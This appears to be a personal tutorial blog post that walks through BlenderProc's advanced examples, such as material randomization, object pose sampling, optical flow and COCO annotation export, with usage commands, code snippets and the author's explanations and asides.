    obj = bproc.loader.load_blend(args.model)[0]

    haven_hdri_path = bproc.loader.get_random_world_background_hdr_img_path_from_haven(args.hdri_path)
    bproc.world.set_world_background_hdr_img(haven_hdri_path)
1. bproc.loader.load_blend(args.model) loads the Blender model file specified by args.model. The function returns a list of objects; we store the first one in the variable obj.
2. bproc.loader.get_random_world_background_hdr_img_path_from_haven(args.hdri_path) fetches the path of a random HDR image: it scans the args.hdri_path directory for .hdr files and returns one chosen at random.
3. Finally, bproc.world.set_world_background_hdr_img(haven_hdri_path) sets the chosen HDR image as the Blender world background, so that the 3D model and the selected HDR image combine into a realistic scene.

# Add dust to all materials of the loaded object
for material in obj.get_materials():
    bproc.material.add_dust(material, strength=0.8, texture_scale=0.05)

This code adds a dust effect to every material of a model object already loaded into Blender.

Concretely, it performs the following steps:

1. obj.get_materials() fetches all materials of obj, and a for loop iterates over each one.

2. Inside the loop, bproc.material.add_dust(material, strength=0.8, texture_scale=0.05) adds dust to the current material. The function takes three arguments:

  • material: the material to add dust to.
  • strength: the strength of the dust, default 0.5.
  • texture_scale: the scale of the dust texture, default 0.01.

  The function applies a dust texture to the material according to these parameters, making it look more realistic.

So this code is an easy way to add a dust effect to model objects already loaded into Blender.

    Object selection and manipulation using displacement modifier

This example demonstrates how to manipulate entities by adding displacement modifiers with different textures, as part of the EntityManipulator module.

    Usage

    blenderproc run examples/advanced/entity_displacement_modifier/main.py examples/resources/scene.obj examples/advanced/entity_displacement_modifier/output

    Visualization

    blenderproc vis hdf5 examples/advanced/entity_displacement_modifier/output/0.hdf5

    png

    Code

# Add displacement to all objects
for obj in objs:
    # Create a uv mapping based on a cylinder projection
    obj.add_uv_mapping("cylinder")

    # Create a random procedural texture
    texture = bproc.material.create_procedural_texture('CLOUDS')
    # Displace the vertices of the object based on that random texture
    obj.add_displace_modifier(
        texture=texture,
        strength=random.gauss(0, 0.5),
        subdiv_level=random.randint(1, 3),
    )

If an object has no UV mapping, we add one, since it is necessary for mapping the displacement texture onto the object. For the UV mapping we use a projection; the projection types Blender offers are "cube", "cylinder", "smart" and "sphere".

Then a displacement modifier with a random texture is added to every entity (a parameter sketch follows this list):

• strength is the amount of geometric displacement. Here strength is sampled from a Gaussian distribution with mean 0.0 and standard deviation 0.5.
• If subdivision is applied, subdiv_level defines how many subdivisions to perform on the entity. In this example we use one to three (random.randint(1, 3) is inclusive on both ends).
• mid_level is the texture value the modifier treats as zero displacement. Texture values below this threshold displace negatively along the chosen direction, values above it positively: displacement = texture_value - mid_level. Keep in mind that color/luminosity values in Blender typically range from 0.0 to 1.0, not from 0 to 255.
• By passing a value for min_vertices_for_subdiv we can check whether the entity needs a subdivision modifier: if the entity has fewer vertices than min_vertices_for_subdiv, a Subdivision modifier is added to increase the vertex count. The vertex count strongly affects the displacement modifier; with too few vertices the displacement looks poor.
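
A hedged sketch of the same call with the parameters named above spelled out explicitly (the values are illustrative, not taken from the example):

# Sketch: displacement with an explicit mid_level and a vertex-count guard
obj.add_displace_modifier(
    texture=texture,
    strength=random.gauss(0, 0.5),
    mid_level=0.5,                  # texture value that maps to zero displacement
    subdiv_level=2,
    min_vertices_for_subdiv=10000   # subdivide first if the mesh has fewer vertices
)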

    Camera lens distortion generation and validation

This program generates a typical BlenderProc synthetic scene together with distorted images (RGB, depth and normals) of a precisely measured camera calibration plate with known pose and intrinsics. The latter are used to validate the geometric camera model by comparing the generated images with real ones.

Emmmm, I probably won't need this one.

    Usage

    Standard Scene:

    blenderproc run examples/advanced/lens_distortion/main.py examples/resources/scene.obj examples/advanced/lens_distortion/output

    png

    simple calibration image by loading intrinsics and extrinsics from a file:

    blenderproc run examples/advanced/lens_distortion/main_callab.py examples/advanced/lens_distortion/callab_platte.obj examples/advanced/lens_distortion/camera_calibration_callab_img1.cal examples/advanced/lens_distortion/output

    png

    fairly distorted image:

    blenderproc run examples/advanced/lens_distortion/main_callab.py examples/advanced/lens_distortion/callab_platte_justin.obj examples/advanced/lens_distortion/camera_calibration_callab_img2.cal examples/advanced/lens_distortion/output

    png

• Load the objects; position them at the origin of the world reference frame.
• Create a point light source.
• Set the camera intrinsics, including the lens distortion parameters.
• Initialize the undistorted-to-distorted coordinate mapping for all generated undistorted images (usually at a higher resolution than required), which are eventually warped.
• Sample camera-to-object poses for the first example, or load camera poses measured with camera calibration software (e.g. DLR CalLab v1).
• Render the RGB, depth and normal images.
• Apply the lens distortion (to the temporary, higher-resolution intermediate Blender images), then crop them to the desired resolution.
• Write the distorted data into an .hdf5 container.
• Test by comparing the generated images with the reference real images ./images/lens_img1_real.jpg and ./images/lens_img2_real.png.

    Material Randomization

    Usage

    blenderproc run examples/advanced/material_randomizer/main.py examples/resources/scene.obj examples/advanced/material_randomizer/output
    • examples/advanced/material_randomizer/main.py: path to the main python file to run.
    • examples/resources/scene.obj: path to the object file with the basic scene.
    • examples/advanced/material_randomizer/output: path to the output directory.

Visualization

Results from multiple runs; the materials generally differ:

    png

    png

    Code

# Collect all materials
materials = bproc.material.collect_all()

# Go through all objects
for obj in objs:
    # For each material of the object
    for i in range(len(obj.get_materials())):
        # In 50% of all cases
        if np.random.uniform(0, 1) <= 0.5:
            # Replace the material with a random one
            obj.set_material(i, random.choice(materials))

This code goes through all objects loaded into Blender and randomly swaps their materials.

Concretely, it performs the following steps:

1. for obj in objs: iterates over every object loaded in the Blender environment.
2. For the current object, for i in range(len(obj.get_materials())): iterates over each of its material slots.
3. In each iteration, np.random.uniform(0, 1) draws a random number between 0 and 1; if it is at most 0.5, i.e. with 50% probability, the next step runs.
4. obj.set_material(i, random.choice(materials)) replaces the current material with one picked at random from the materials list collected above.

So this code randomly changes the materials of all loaded objects with a fixed probability, giving the renderer richer and more varied outputs. (A reproducibility sketch follows.)
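
Because the snippet mixes two RNGs (np.random.uniform and random.choice), a minimal sketch for making runs reproducible is to seed both before the loop:

# Sketch: seed both random number generators used by the snippet above
import random
import numpy as np

random.seed(42)
np.random.seed(42)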

    Motion Blur and Rolling Shutter

In this example we show how to generate motion blur and a rolling shutter effect.

These effects become visible when the camera or objects move between frames. Here the camera performs the following motion while the objects stand still:

    0 -10 4 1.3 0 0 # initial position
    0 -15 4 1.3 0 0 # moving away from object
    5 -15 4 1.3 0 0 # moving to the right
    5 -15 8 1.3 0 0 # moving upwards
    1 -11 5 1.3 0 0 # combined motion (to the left, towards object and downwards)

    Usage

    blenderproc run examples/advanced/motion_blur_rolling_shutter/config_motion_blur.yaml examples/advanced/motion_blur_rolling_shutter/camera_positions examples/resources/scene.obj examples/advanced/motion_blur_rolling_shutter/output

Couldn't get it to run. Argh.

    Object pose sampling

This example focuses on object.ObjectPoseSampler, which allows object pose sampling inside a sampling volume with collision checks.

    Usage

    blenderproc run examples/advanced/object_pose_sampling/main.py examples/resources/camera_positions examples/resources/scene.obj examples/advanced/object_pose_sampling/output
    • examples/advanced/object_pose_sampling/main.py: path to the main python file to run.
    • examples/resources/camera_positions: text file with parameters of camera positions.
    • examples/resources/scene.obj: path to the object file with the basic scene.
    • examples/advanced/object_pose_sampling/output: path to the output directory.

    Visualization

    blenderproc vis hdf5 examples/advanced/object_pose_sampling/output/0.hdf5

    png

    Code

# Define a function that samples the pose of a given object
def sample_pose(obj: bproc.types.MeshObject):
    obj.set_location(np.random.uniform([-5, -5, -5], [5, 5, 5]))
    obj.set_rotation_euler(np.random.uniform([0, 0, 0], [np.pi * 2, np.pi * 2, np.pi * 2]))

# Sample the poses of all objects, while making sure that no objects collide with each other.
bproc.object.sample_poses(
    objs,
    sample_pose_func=sample_pose,
    objects_to_check_collisions=objs
)

Define a function that samples and sets an object's location and rotation. Each object is placed at the sampled pose, and collision checks are run against all objects given in objects_to_check_collisions (all objects by default). On collision the position is reset and sampling is retried; the maximum number of attempts can be set with max_tries (a sketch follows).
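
A hedged sketch of the same call with an explicit retry budget (the keyword max_tries comes from the description above; the value is illustrative):

# Sketch: stop retrying an object's pose after 1000 failed attempts
bproc.object.sample_poses(
    objs,
    sample_pose_func=sample_pose,
    objects_to_check_collisions=objs,
    max_tries=1000
)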

    On surface object pose Sampling

This example focuses on the OnSurfaceSampler, which allows pose sampling for selected objects on top of a chosen surface.

    Usage

    blenderproc run examples/advanced/on_surface_object_sampling/main.py examples/resources/camera_positions examples/advanced/on_surface_object_sampling/scene.blend examples/advanced/on_surface_object_sampling/output
    • examples/advanced/on_surface_object_sampling/main.py: path to the main python file to run.
    • examples/resources/camera_positions: text file with parameters of camera positions.
    • examples/advanced/on_surface_object_sampling/scene.blend: path to the object file with the basic scene.
    • examples/advanced/on_surface_object_sampling/output: path to the output directory.

    Visualization

    blenderproc vis hdf5 examples/advanced/on_surface_object_sampling/output/0.hdf5

    png

    png

    Code

# Define a function that samples the pose of a given object
def sample_pose(obj: bproc.types.MeshObject):
    # Sample the spheres location above the surface
    obj.set_location(bproc.sampler.upper_region(
        objects_to_sample_on=[surface],
        min_height=1,
        max_height=4,
        use_ray_trace_check=False
    ))
    obj.set_rotation_euler(np.random.uniform([0, 0, 0], [np.pi * 2, np.pi * 2, np.pi * 2]))

This code defines a function sample_pose and uses it to sample poses for model objects loaded into Blender.

Concretely, it performs the following steps:

1. The function sample_pose takes one argument obj of type bproc.types.MeshObject, the model object whose pose is to be sampled, and does the following:
  • It samples a location with bproc.sampler.upper_region() and applies it with obj.set_location(). The parameters used here are:
    • objects_to_sample_on: a list of objects to sample on top of; here it contains the surface object.
    • min_height and max_height: the minimum and maximum height of the sampled location; here 1 and 4, i.e. between 1 and 4 units above the surface object.
    • use_ray_trace_check: a boolean controlling whether a ray-trace check is used to avoid sampled locations that intersect other objects; here it is set to False.
  • It draws a random Euler-angle vector with np.random.uniform([0, 0, 0], [np.pi * 2, np.pi * 2, np.pi * 2]) and applies it with obj.set_rotation_euler().
2. Once defined, the function can be used to sample locations and orientations for loaded model objects, adding variety and realism, particularly when an object should be placed above a surface.

So this code is a simple recipe for sampling object poses that can be extended into more complex sampling logic for richer, more realistic renders.

# Sample the spheres on the surface
spheres = bproc.object.sample_poses_on_surface(spheres, surface, sample_pose, min_distance=0.1, max_distance=10)

Set up the rigid bodies:

# Enable physics for spheres (active) and the surface (passive)
for sphere in spheres:
    sphere.enable_rigidbody(True)
surface.enable_rigidbody(False)

Run the physics simulation:

# Run the physics simulation
bproc.object.simulate_physics_and_fix_final_poses(min_simulation_time=2, max_simulation_time=4, check_object_interval=1)

    Optical Flow

In this example we demonstrate how to obtain forward/backward flow values between consecutive key frames.

Flow becomes visible when the camera or objects move between frames. Here the camera performs the following motion:

    0 -10 4 1.3 0 0  # initial position
    0 -12 4 1.3 0 0 # moving away from object
    2 -12 4 1.3 0 0 # moving to the right
    2 -12 6 1.3 0 0 # moving upwards
    1 -11 5 1.3 0 0 # combined motion (to the left, towards object and downwards)

    Usage

    blenderproc run examples/advanced/optical_flow/main.py examples/advanced/optical_flow/camera_positions examples/resources/scene.obj examples/advanced/optical_flow/output
    • examples/advanced/optical_flow/main.py: path to the main python file to run.
    • examples/advanced/optical_flow/camera_positions: text file with parameters of camera positions.
    • examples/resources/scene.obj: path to the object file with the basic scene.
    • examples/advanced/optical_flow/output: path to the output directory.

Visualization

    blenderproc vis hdf5 examples/advanced/optical_flow/output/1.hdf5

    png

    Code

    # Render the optical flow (forward and backward) for all frames
    data.update(bproc.renderer.render_optical_flow(get_backward_flow=True, get_forward_flow=True, blender_image_coordinate_style=False))
• Iterates over all camera poses and renders the forward and/or backward optical flow.
• Renders the images in .exr format, which allows a linear color space and higher precision, and then converts them into numpy.float32 arrays.
• By default, Blender uses the bottom-left corner as the coordinate origin, whereas OpenCV and the popular flow datasets use the top-left corner. For the default Blender behavior, set the flag "blender_image_coordinate_style": True. Note that the colors in the visualization will then differ! (A flag sketch follows this list.)
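
A minimal sketch of the flag combinations described above, using the same function as in the example: render only the forward flow, in OpenCV-style (top-left origin) coordinates:

# Sketch: forward flow only, top-left-origin coordinates
data.update(bproc.renderer.render_optical_flow(get_forward_flow=True,
                                               get_backward_flow=False,
                                               blender_image_coordinate_style=False))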

    Convex decomposition for generating stable and exact collision shapes

When running a physics simulation in Blender, choosing the right collision shape is crucial for stable results. The CONVEX_HULL collision shape gives very stable simulations, but for non-convex objects the result can look very unrealistic (e.g. objects appear to float). The MESH collision shape allows more exact collisions, but the simulation becomes very unstable and objects may penetrate each other.

CONVEX_DECOMPOSITION is the compromise between the two: the V-HACD algorithm decomposes a given non-convex object into multiple approximately convex parts, whose union can then be used as an exact and stable collision shape for the object.

In this example we load a bin and some highly non-convex ShapeNet objects, apply convex decomposition to generate collision shapes, and then let the objects drop into the bin.

The dataset is hard to download and I probably won't need it. Give up!

    Random Backgrounds

    jpg

In this example we generate renderings of an object (Suzanne) and paste them onto random background images, randomizing the object's position, orientation, material properties and lighting. This is a simple way to generate data for training classification, object detection and segmentation tasks. It is easy to implement and use, but usually yields poorer results than rendering objects inside real 3D scenes.

    Usage

    blenderproc run examples/advanced/random_backgrounds/main.py examples/advanced/random_backgrounds/object.ply examples/advanced/random_backgrounds/output
    • examples/advanced/random_backgrounds/main.py: path to the main python file to run.
    • examples/advanced/random_backgrounds/object.ply: path to the object file.
    • examples/advanced/random_backgrounds/output: path to the output directory.

Emmm, so: render an image without a background, then swap in some other background.

Then run:

python examples/advanced/random_backgrounds/paste_images_on_backgrounds.py --images examples/advanced/random_backgrounds/output/coco_data/images --backgrounds path/to/background/images --overwrite

to add the backgrounds.

    Code

    # Enable transparency so the background becomes transparent
    bproc.renderer.set_output_format(enable_transparency=True)

This code enables the transparent-background feature of Blender's renderer, so that the background of the rendered output becomes transparent.

Concretely, it does the following:

1. It calls set_output_format() from the bproc.renderer module, which configures the render output format, passing enable_transparency=True to enable transparency.
2. With transparency enabled, the background is rendered as transparent, so the result can be composited and layered seamlessly in other software.

So this line is a quick way to switch on transparent backgrounds in the Blender renderer for later image processing and compositing. (A compositing sketch follows.)
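
As a hedged, standalone illustration of what the provided paste_images_on_backgrounds.py script does conceptually, an RGBA render can be composited onto a background with PIL (the file names here are hypothetical):

# Sketch: paste a transparent render onto a background image
from PIL import Image

render = Image.open("render.png").convert("RGBA")
background = Image.open("background.jpg").convert("RGBA").resize(render.size)
background.alpha_composite(render)   # in-place alpha compositing
background.convert("RGB").save("composited.jpg")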

    Random Room Constructor

This example explains the RandomRoomConstructor. The module builds random rooms and places objects loaded by other modules inside them.

This example uses the CCMaterialLoader, so the cc_textures have to be downloaded; a script is provided for that. It also uses the IkeaLoader; see the Ikea example.

Both must be set up before this example can be used.

Also hard to download. Give up!

    Code

# Load materials and objects that can be placed into the room
materials = bproc.loader.load_ccmaterials(args.cc_material_path, ["Bricks", "Wood", "Carpet", "Tile", "Marble"])
interior_objects = []
for i in range(15):
    interior_objects.extend(bproc.loader.load_ikea(args.ikea_path, ["bed", "chair", "desk", "bookshelf"]))

The cc_textures were downloaded via the script; here only assets whose name contains one of the listed names are used. That keeps the result realistic, since materials like "Asphalt" are not usually found indoors. In addition, 15 objects are loaded from the specified Ikea dataset categories.

# Construct random room and fill with interior_objects
objects = bproc.constructor.construct_random_room(used_floor_area=25,
                                                  interior_objects=interior_objects,
                                                  materials=materials, amount_of_extrusions=5)

construct_random_room builds a random floor plane and constructs the matching walls and ceiling. It places the loaded Ikea objects at random locations and assigns cc-texture materials. The room's floor area is 25 square meters and it has at most 5 extrusions. An extrusion is a corridor branching off the central base rectangle; extrusions can be wider or narrower, but never narrower than the minimum corridor_width. The module automatically distributes the 25 square meters over all extrusions. (A parameter sketch follows.)
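
A hedged sketch of the same construction call with the minimum corridor width made explicit (corridor_width is named in the description above; the value is illustrative):

# Sketch: cap how narrow the extruded corridors may get
objects = bproc.constructor.construct_random_room(used_floor_area=25,
                                                  interior_objects=interior_objects,
                                                  materials=materials,
                                                  amount_of_extrusions=5,
                                                  corridor_width=0.9)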

    # Bring light into the room
    bproc.lighting.light_surface([obj for obj in objects if obj.get_name() == "Ceiling"], emission_strength=4.0)

Make the ceiling emit light, and remove any material already placed on it.

    ]]>
    + 资源

    仓库地址:DLR-RM/BlenderProc: A procedural Blender pipeline for photorealistic training image generation (github.com),下载到本地,用 python 打开,解释器使用之前创建的 blender 环境。

    课程

    Auto shading

    Usage

    1
    blenderproc run examples/advanced/auto_shading/main.py examples/advanced/auto_shading/camera_position examples/advanced/auto_shading/scene.blend examples/advanced/auto_shading/output
    • examples/advanced/auto_shading/main.py: path to the main python file to run.
    • examples/advanced/auto_shading/camera_position: text file with parameters of camera positions.
    • examples/advanced/auto_shading/scene.blend: path to the blend file with the basic scene.
    • examples/advanced/auto_shading/output: path to the output directory.

    Visualization

    1
    blenderproc vis hdf5 examples/advanced/auto_shading/output/0.hdf5

    png

    Code

    1
    2
    3
    4
    5
    6
    7
    8
    9
    # Find the object with name "Sphere"
    sphere = bproc.filter.one_by_attr(objs, "name", "Sphere")
    # Set it to AUTO shading, so all angles greater than 45 degrees will be shaded flat.
    sphere.set_shading_mode("auto", 45)

    # Find the object with name "Sphere.001"
    other_sphere = bproc.filter.one_by_attr(objs, "name", "Sphere.001")
    # Set it to smooth shading, so all angles will be shaded flat.
    other_sphere.set_shading_mode("smooth")
    • 通过调用 bproc.filter.one_by_attr(objs, “name”, “Sphere”) 函数找到名为 “Sphere” 的物体,并将其赋值给变量 sphere。

    • 调用 sphere.set_shading_mode(“auto”, 45) 函数,将 sphere 对象的着色模式设置为 AUTO,表示自动根据面的角度决定使用平坦或平滑着色。同时给定一个阈值参数 45,即当面的角度大于 45 度时,该面将使用平坦着色,否则使用平滑着色。

    • 通过调用 bproc.filter.one_by_attr(objs, “name”, “Sphere.001”) 函数找到名为 “Sphere.001” 的物体,并将其赋值给变量 other_sphere。

    • 调用 other_sphere.set_shading_mode(“smooth”) 函数,将 other_sphere 对象的着色模式设置为 SMOOTH,表示所有面都使用平滑着色。

    Camera Depth of Field

    Usage

    1
    blenderproc run examples/advanced/camera_depth_of_field/main.py examples/resources/scene.obj examples/advanced/camera_depth_of_field/output
    • examples/advanced/camera_depth_of_field/main.py: path to the main python file to run.
    • examples/resources/scene.obj: path to the object file with the basic scene.
    • examples/advanced/camera_depth_of_field/output: path to the output directory.

    Visualization

    1
    blenderproc vis hdf5 examples/advanced/camera_depth_of_field/output/0.hdf5

    png

    Code

    设置视点:

    1
    2
    3
    # Create an empty object which will represent the cameras focus point
    focus_point = bproc.object.create_empty("Camera Focus Point")
    focus_point.set_location([0.5, -1.5, 3])
    1
    2
    3
    4
    # define the camera intrinsics
    bproc.camera.set_resolution(512, 512)
    # Set the empty object as focus point and set fstop to regulate the sharpness of the scene
    bproc.camera.add_depth_of_field(focus_point, fstop_value=0.25)

    首先,通过调用 bproc.camera.set_resolution(512, 512) 函数设置相机分辨率为 512x512 像素。

    接着,通过调用 bproc.camera.add_depth_of_field(focus_point, fstop_value=0.25) 函数来添加景深效果。其中,focus_point 表示景深的焦点,即相机聚焦的对象(通常为场景中心)。fstop_value 参数控制景深的浅深范围,值越小,景深效果越明显。在本例中,fstop_value 被设置为 0.25,表明所拍摄的场景会呈现出比较明显的景深效果。

    COCO annotations

    Usage

    1
    blenderproc run examples/advanced/coco_annotations/main.py examples/resources/camera_positions examples/advanced/coco_annotations/scene.blend examples/advanced/coco_annotations/output
    • examples/advanced/coco_annotations/main.py: path to the main python file to run.
    • examples/resources/camera_positions: text file with parameters of camera positions.
    • examples/advanced/coco_annotations/scene.blend: path to the blend file with the basic scene.
    • examples/advanced/coco_annotations/output: path to the output directory.

    Visualization

    使用 blenderproc 可视化 COCO 数据集格式的命令示例:

    1
    blenderproc vis coco [-i <image index>] [-c <coco annotations json>] [-b <base folder of coco json and image files>]

    生成 COCO 数据集形式的文件:

    png

    coco_annoatations.json 里的内容(感觉存了一段乱七八糟的东西):

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    {
    "info": {
    "description": "coco_annotations",
    "url": "https://github.com/waspinator/pycococreator",
    "version": "0.1.0",
    "year": 2020,
    "contributor": "Unknown",
    "date_created": "2023-06-04 23:59:39.563796"
    },
    "licenses": [
    {
    "id": 1,
    "name": "Attribution-NonCommercial-ShareAlike License",
    "url": "http://creativecommons.org/licenses/by-nc-sa/2.0/"
    }
    ],
    "categories": [
    {
    "id": 1,
    "supercategory": "coco_annotations",
    "name": "Suzanne"
    },

    ...

    {
    "id": 9,
    "supercategory": "coco_annotations",
    "name": "Cube.001"
    }
    ],
    "images": [
    {
    "id": 0,
    "file_name": "images/000000.jpg",
    "width": 512,
    "height": 512,
    "date_captured": "2023-06-04 23:59:39.563796",
    "license": 1,
    "coco_url": "",
    "flickr_url": ""
    },
    {
    "id": 1,
    "file_name": "images/000001.jpg",
    "width": 512,
    "height": 512,
    "date_captured": "2023-06-04 23:59:39.672089",
    "license": 1,
    "coco_url": "",
    "flickr_url": ""
    }
    ],
    "annotations": [
    {
    "id": 1,
    "image_id": 0,
    "category_id": 1,
    "iscrowd": 0,
    "area": 8330,
    "bbox": [
    184,
    98,
    144,
    114
    ],
    "segmentation": {
    "counts": [
    94341,

    ...

    94583
    ],
    "size": [
    512,
    512
    ]
    },
    "width": 512,
    "height": 512
    },

    ...

    {
    "id": 16,
    "image_id": 1,
    "category_id": 9,
    "iscrowd": 0,
    "area": 25473,
    "bbox": [
    0,
    456,
    512,
    56
    ],
    "segmentation": {
    "counts": [
    460,

    ...

    34
    ],
    "size": [
    512,
    512
    ]
    },
    "width": 512,
    "height": 512
    }
    ]
    }

    在本例中:

    1
    blenderproc vis coco -i 1 -c coco_annotations.json -b examples/advanced/coco_annotations/output/coco_data

    然后你就会喜提报错:

    1
    2
    3
    4
    AttributeError: module 'numpy' has no attribute 'bool'.
    `np.bool` was a deprecated alias for the builtin `bool`. To avoid this error in existing code, use `bool` by itself. Doing this will not modify any behavior and is safe. If you specifically wanted the numpy scalar type, use `np.bool_` here.
    The aliases was originally deprecated in NumPy 1.20; for more details and guidance see the original release note at:
    https://numpy.org/devdocs/release/1.20.0-notes.html#deprecations. Did you mean: 'bool_'?

    vis_coco_annotation.py 里找到这行 np.bool_,把它改成 bool_

    png

    重新开跑!

    png

    Code

    1
    2
    3
    # Set some category ids for loaded objects
    for j, obj in enumerate(objs):
    obj.set_cp("category_id", j + 1)

    要创建 COCO 标注,我们需要渲染实例和类别映射。类别是根据自定义属性 “category_id” 定义的,该属性必须为每个实例预先定义。可以像上面一样通过自定义属性或在加载器中设置 category_id,也可以直接在 .blend 文件中定义。同时,我们还将 “name” 添加到映射中,以便稍后在 COCO 标注写入器中使用对象的名称为类别进行标记。


    1
    bproc.renderer.enable_segmentation_output(map_by=["category_id", "instance", "name"])

    调用 bproc.renderer.enable_segmentation_output(map_by=[“category_id”, “instance”, “name”]) 函数激活分割渲染功能。

    其中,“category_id”、“instance” 和 “name” 分别表示三种不同的标记方式,即按类别、物体实例和名称进行标记。

    这个函数的作用是将场景中的每个物体按照所选的标记方式标记,并将标记信息存储到渲染结果中。例如,如果选择 “category_id” 标记,则每个物体会被分配一个唯一的整数 ID,表示其所属的类别。


    1
    2
    3
    4
    5
    6
    # Write data to coco file
    bproc.writer.write_coco_annotations(os.path.join(args.output_dir, 'coco_data'),
    instance_segmaps=data["instance_segmaps"],
    instance_attribute_maps=data["instance_attribute_maps"],
    colors=data["colors"],
    color_file_format="JPEG")

    使用 bproc.writer.write_coco_annotations()生成 COCO 数据集。

    此函数将注释存储在 coco_annotations.json 中。可选地,您可以在 writer.CocoAnnotationsWriter 配置中设置 "supercategory": "<some_supercategory>",以通过先前分配的自定义属性 "supercategory" 过滤对象。

    通过调用 bproc.writer.write_coco_annotations() 函数将场景中的分割信息和属性信息写入 COCO 格式的注释文件中。

    其中:

    • os.path.join(args.output_dir, ‘coco_data’) 是注释文件的保存路径
    • instance_segmaps、instance_attribute_maps 和 colors 分别表示物体实例分割图、物体属性图和物体颜色信息,这些信息都是从渲染结果中提取得到的
    • color_file_format 参数表示颜色信息保存格式,这里被设置为 JPEG 格式。
    • 此函数会自动将提供的分割信息和属性信息转换为 COCO 格式,并将其保存到指定路径下的注释文件中。

    bproc.writer.write_coco_annotations()

    1
    2
    3
    4
    5
    6
    7
    8
    def write_coco_annotations(output_dir: str, instance_segmaps: Optional[List[np.ndarray]] = None,
    instance_attribute_maps: Optional[List[dict]] = None,
    colors: Optional[List[np.ndarray]] = None, color_file_format: str = "PNG",
    mask_encoding_format: str = "rle", supercategory: str = "coco_annotations",
    append_to_existing_output: bool = True, segmap_output_key: str = "segmap",
    segcolormap_output_key: str = "segcolormap", rgb_output_key: str = "colors",
    jpg_quality: int = 95, label_mapping: Optional[LabelIdMapping] = None,
    file_prefix: str = "", indent: Optional[Union[int, str]] = None):

    此函数按以下步骤编写 COCO 注释:

    1. 定位分割图像
    2. 定位 RGB 映射
    3. 定位 seg mappings
    4. 读取颜色映射
    5. 对于每个帧,编写 coco 注释

    参数解释如下:

    • output_dir:输出目录,用于编写 coco 注释
    • instance_segmaps:实例分割映射的列表
    • instance_attribute_maps:每帧的映射,具有 idx、class 和(可选)supercategory/bop_dataset_name
    • colors:颜色图像的列表。不支持立体图像,请依次输入左和右输入。
    • color_file_format:保存颜色图像的格式
    • mask_encoding_format:二进制掩模的编码格式。默认值为 ‘rle’。可用值:‘rle’、‘polygon’
    • supercategory:要过滤的数据集/超类别名称,例如通过 ‘bop_dataset_name’ 设定的特定 BOP 数据集集合或具有指定 ‘cp_supercategory’ 的任何已加载对象
    • append_to_existing_output:如果为 true,且输出目录中已经有 coco_annotations.json 文件,则新的 coco 注释将被追加到现有文件中。此外,rgb 图像将被命名,以避免冲突。
    • segmap_output_key:分割图像的输出键。应该与 SegMapRenderer 模块的输出键相同。默认值为 ‘segmap’。
    • segcolormap_output_key:为对象名称/类别对应关系注册 CSV 文件的输出键。应该与 SegMapRenderer 模块的 colormap_output_key 相同。默认值为 ‘segcolormap’。
    • rgb_output_key:RGB 图像的输出键。应该与 RgbRenderer 模块的输出键相同。默认值为 ‘colors’。
    • jpg_quality:所需的 jpg 编码质量级别
    • label_mapping:用于基于其 ID 对类别进行标记的标签映射。如果未给定 None,则使用 csv 文件中的 name 字段,或者(如果不存在)使用类别 ID 本身。
    • file_prefix:图像文件名的可选前缀
    • indent:如果缩进是非负整数或字符串,则注释输出将以该缩进级别进行漂亮的打印。缩进级别为 0、负数或 “” 仅插入换行符。None(默认值)选择最紧凑的表示。使用正整数缩进每个层级缩进那么多空格。如果缩进是字符串(例如 “\t”),那么该字符串用于缩进每个级别。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    # 对传入的三个可选参数进行类型检查和处理,确保它们都是列表类型。如果为 None,就改为空列表
    instance_segmaps = [] if instance_segmaps is None else list(instance_segmaps)
    colors = [] if colors is None else list(colors)
    #(怎么代码风格跟上面的不太一样?)
    if instance_attribute_maps is None:
    instance_attribute_maps = []

    # 检查 colors[0] 是否是四维数组,如果是,则抛出 ValueError 异常。这是因为 BlenderProc 目前不支持渲染立体图像,只能生成左右视图分别的图像/分割图像。
    if len(colors) > 0 and len(colors[0].shape) == 4:
    raise ValueError("BlenderProc currently does not support writing coco annotations for stereo images. "
    "However, you can enter left and right images / segmaps separately.")

    1
    2
    3
    # Create output directory
    # 创建输出目录,其中 'images' 目录用于存储转换后的图像。如果该目录已经存在,则不会创建新目录。
    os.makedirs(os.path.join(output_dir, 'images'), exist_ok=True)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    # 这些代码块用于查找渲染时生成的 RGB 图像、实例分割图像和属性映射文件的路径
    if not instance_segmaps:
    # 如果 instance_segmaps 列表是空的,则该代码会查找实例分割图像的路径,使用 Utility.find_registered_output_by_key() 方法查找已注册的输出
    # Find path pattern of segmentation images
    segmentation_map_output = Utility.find_registered_output_by_key(segmap_output_key)
    if segmentation_map_output is None:
    # 如果找不到 key 为 segmap_output_key 的输出,则引发 RuntimeError 异常,提示用户在运行 write_coco_annotations() 函数之前先运行 SegMapRenderer 模块
    raise RuntimeError(f"There is no output registered with key {segmap_output_key}. Are you sure you "
    f"ran the SegMapRenderer module before?")

    if not colors:
    # Find path pattern of rgb images
    # 如果 colors 列表为空,则该代码会查找 RGB 图像的路径
    rgb_output = Utility.find_registered_output_by_key(rgb_output_key)
    if rgb_output is None:
    # 如果找不到 key 为 rgb_output_key 的输出,则引发 RuntimeError 异常,提示用户在运行 write_coco_annotations() 函数之前先运行 RgbRenderer 模块
    raise RuntimeError(f"There is no output registered with key {rgb_output_key}. Are you sure you "
    f"ran the RgbRenderer module before?")

    if not instance_attribute_maps:
    # Find path of name class mapping csv file
    # 如果 instance_attribute_maps 列表为空,则该代码会查找实例分割图像到名称、类别标签的映射文件的路径
    segcolormap_output = Utility.find_registered_output_by_key(segcolormap_output_key)
    if segcolormap_output is None:
    # 如果找不到 key 为 segcolormap_output_key 的输出,则引发 RuntimeError 异常,提示用户在运行 write_coco_annotations() 函数之前先运行 SegMapRenderer 模块,并将 map_by 参数设置为 instance
